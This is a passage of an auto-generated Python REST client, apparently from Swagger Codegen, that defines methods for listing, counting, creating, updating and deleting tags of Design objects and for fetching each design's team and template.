def designs_id_tags_count_get_with_http_info(self, id, **kwargs):
"""
Counts tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_delete(self, id, **kwargs):
"""
Deletes all tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_delete_with_http_info(id, **kwargs)
return data
def designs_id_tags_delete_with_http_info(self, id, **kwargs):
"""
Deletes all tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_get(self, id, **kwargs):
"""
Queries tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_get_with_http_info(id, **kwargs)
return data
def designs_id_tags_get_with_http_info(self, id, **kwargs):
"""
Queries tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_get`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Tag]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_post(self, id, **kwargs):
"""
Creates a new instance in tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_post_with_http_info(id, **kwargs)
return data
def designs_id_tags_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in tags of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param Tag data:
:return: Tag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_post`")
collection_formats = {}
resource_path = '/Designs/{id}/tags'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Tag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_rel_fk_delete(self, id, fk, **kwargs):
"""
Remove the tags relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_rel_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_rel_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Remove the tags relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_rel_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_rel_fk_head(self, id, fk, **kwargs):
"""
Check the existence of tags relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_head(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_rel_fk_head_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_rel_fk_head_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_rel_fk_head_with_http_info(self, id, fk, **kwargs):
"""
Check the existence of tags relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_head_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_rel_fk_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_head`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_head`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_rel_fk_put(self, id, fk, **kwargs):
"""
Add a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param DesignTag data:
:return: DesignTag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_rel_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_tags_rel_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_tags_rel_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Add a related item by id for tags.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_rel_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for tags (required)
:param DesignTag data:
:return: DesignTag
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_tags_rel_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_tags_rel_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_tags_rel_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/tags/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignTag',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_team_get(self, id, **kwargs):
"""
Fetches belongsTo relation team.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_team_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_team_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_team_get_with_http_info(id, **kwargs)
return data
def designs_id_team_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation team.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_team_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_team_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_team_get`")
collection_formats = {}
resource_path = '/Designs/{id}/team'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_template_get(self, id, **kwargs):
"""
Fetches belongsTo relation template.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_template_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_template_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_template_get_with_http_info(id, **kwargs)
return data
def designs_id_template_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation template.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_template_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_template_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_template_get`")
collection_formats = {}
resource_path = '/Designs/{id}/template'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
